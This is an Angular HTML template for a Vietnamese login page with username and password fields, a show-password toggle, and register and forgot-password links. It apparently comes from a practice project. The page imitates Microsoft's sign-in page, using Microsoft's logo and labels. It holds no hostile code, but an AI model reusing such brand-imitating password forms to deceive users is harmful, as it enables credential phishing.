<body>
    <br>
    <br>
    <div class="background" style=" background: #ebebeb url(../assets/images/slider.png) repeat fixed center;">
        <div class="blur"></div>
        <div class="full"></div>
    </div>
    <div class="outer">
        <div class="middle">
            <main class="inner" style="margin-left: auto;
            margin-right: auto;
            position: relative;
            min-height: 338px;
            min-width: 320px;
            max-width: 440px;
            width: calc(100% - 40px);
            padding: 44px;
            margin-bottom: 28px;
            background-color: #fff;
            box-shadow: 0 2px 3px rgba(0,0,0,0.55);
            border: 1px solid rgba(0,0,0,0.4);">
                <div class="margin-bottom-20">
                    <picture class="logo margin-bottom-16" role="presentation">
                        <source
                            srcset="https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.svg?b=12121.30550">
                        <img src="https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=12121.30550"
                            alt="Logo Microsoft" data-bind="attr: {alt: config.text.microsoftLogo}">
                    </picture>
                </div>


                <div role="dialog" aria-labelledby="signInTitle" aria-describedby="signInDescription">
                    <div id="signInTitle" class="row text-title margin-bottom-16" aria-hidden="true"
                        data-bind="text: config.text.header" style="font-size: 1.5rem;
                        line-height: 1.75rem;
                        padding: 4px 12px 4px 12px;
                        margin-top: 0px;
                         margin-bottom: 16px;
                        font-weight: 60px ; font-family: Arial, Helvetica, sans-serif">Đăng nhập
                    </div>

                    <div class="alert alert-error text-body margin-bottom-12 col-md-12" role="alert"
                        aria-live="assertive" aria-relevant="text" aria-atomic="true"
                        data-bind="visible: error, html: error" style="display: none;"></div>
                    <!-- <div class="row margin-bottom-16">
                        <div class="form-group col-md-12 placeholderContainer">
                            <input type="email" class="form-control" placeholder="Email, điện thoại hoặc Skype"
                                aria-required="true" aria-label="Email, điện thoại hoặc Skype" spellcheck="false"
                                autocomplete="off"
                                data-bind="hasFocus: focus, textInput: email,
                                    attr: {'placeholder': config.text.emailPlaceHolder, 'aria-label': config.text.emailPlaceHolderAria, 'aria-invalid': !error}"
                                style="border-color: rgba(0,0,0,0.6);
                                    border-top-width: 0px;
                                    border-left-width: 0px;
                                    border-right-width: 0px;
                                    border-bottom-width: 1px;
                                    border-radius: 0px;">

                        </div> -->
                    <!-- <div class="form-group col-md-12 placeholderContainer">
                            <input type="password" class="form-control" placeholder="Password" aria-required="true"
                                aria-label="Email, điện thoại hoặc Skype" spellcheck="false" autocomplete="off"
                                data-bind="hasFocus: focus, textInput: email,
                                    attr: {'placeholder': config.text.emailPlaceHolder, 'aria-label': config.text.emailPlaceHolderAria, 'aria-invalid': !error}"
                                style="border-color: rgba(0,0,0,0.6);
                                    border-top-width: 0px;
                                    border-left-width: 0px;
                                    border-right-width: 0px;
                                    border-bottom-width: 1px;
                                    border-radius: 0px;">
                        </div> -->
                    <div class="a">
                        <div class="b row">
                            <div class="col-md-12">
                                <div class="col-md-12">
                                    <div class="">
                                        <form action="/action_page.php" class="was-validated"
                                            (ngSubmit)="onsubmit(signin);" #signin="ngForm">
                                            <div class="form-group">
                                                <input type="text" class="form-control" id="uname"
                                                    placeholder="Username" name="uname" [(ngModel)]="uname" required>
                                            </div>
                                            <div class="form-group">
                                                <input [type]="showpassword" class="form-control" id="email"
                                                    placeholder="Password" name="pass" [(ngModel)]="pass" required>
                                                <span toggle="#password-field"
                                                    class="fas fa-fw field-icon toggle-password" style="color: olive"
                                                    (click)="hello()">
                                                    <b [ngClass]="{'fa-eye': anhien}"></b>
                                                    <b [ngClass]="{'fa-eye-slash': hienan}"></b></span>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div class="row margin-bottom-20">
                        <div class="col-md-12 section text-secondary">
                            <span data-bind="text: config.text.noAccount">Bạn không có tài khoản?</span>
                            <a href="dangky" aria-label="Tạo tài khoản Microsoft"
                                data-bind="text: config.text.createAccount, attr: {'aria-label': config.text.createAccountAria}, click: msAccountSignUp">Hãy
                                tạo tài khoản!</a>
                        </div>
                        <div class="col-md-12 section text-secondary">
                            <span data-bind="text: config.text.noAccount"></span>
                            <a href="quenmk" aria-label="Tạo tài khoản Microsoft"
                                data-bind="text: config.text.createAccount, attr: {'aria-label': config.text.createAccountAria}, click: msAccountSignUp">Quên
                                Mật Khẩu ?</a>
                        </div>
                    </div>

                </div>


                <div class="form-group" style="padding-left: 220px;">
                    <button type="submit" class="btn btn-warning" (click)="dangnhap();" [disabled]="signin.invalid">
                        Đăng Nhập</button>
                </div>
            </main>
        </div>
    </div>
    <br>
</body>